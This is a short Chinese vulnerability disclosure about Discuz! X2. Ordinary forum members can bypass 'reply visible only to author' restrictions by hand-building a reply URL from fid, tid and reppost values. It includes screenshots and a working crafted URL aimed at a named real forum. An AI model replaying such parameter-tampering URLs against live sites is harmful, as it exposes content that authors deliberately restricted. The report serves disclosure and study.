Discuz! X2 回复仅作者可见控制不严
### 简要描述: Discuz! X2 发布回复仅作者可见的主题帖,普通会员可以绕过该机制获得被隐藏的部分内容 ### 详细说明: 帖子为打开状态时,可以通过楼层获得fid、tid、repposet 这3个参数,手动URL提交,可获取引用回复,引用回复中含有被屏蔽(仅作者可见的)部分内容。 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201301/23232247375d6a331be12d0f1c860f1730451294.jpg" alt="QQ截图20130123232047.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201301/23232247375d6a331be12d0f1c860f1730451294.jpg) [<img src="https://images.seebug.org/upload/201301/232323046ba830413908da83f3ea30f3f8d9566a.jpg" alt="QQ截图20130123232114.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201301/232323046ba830413908da83f3ea30f3f8d9566a.jpg) 拼接的url ``` http://bbs.kafan.cn/forum.php?mod=post&action=reply&fid=227&tid=1456552&reppost=27481431&extra=page%3D1&page=1&infloat=yes&handlekey=reply&inajax=1&ajaxtarget=fwin_content_reply ```
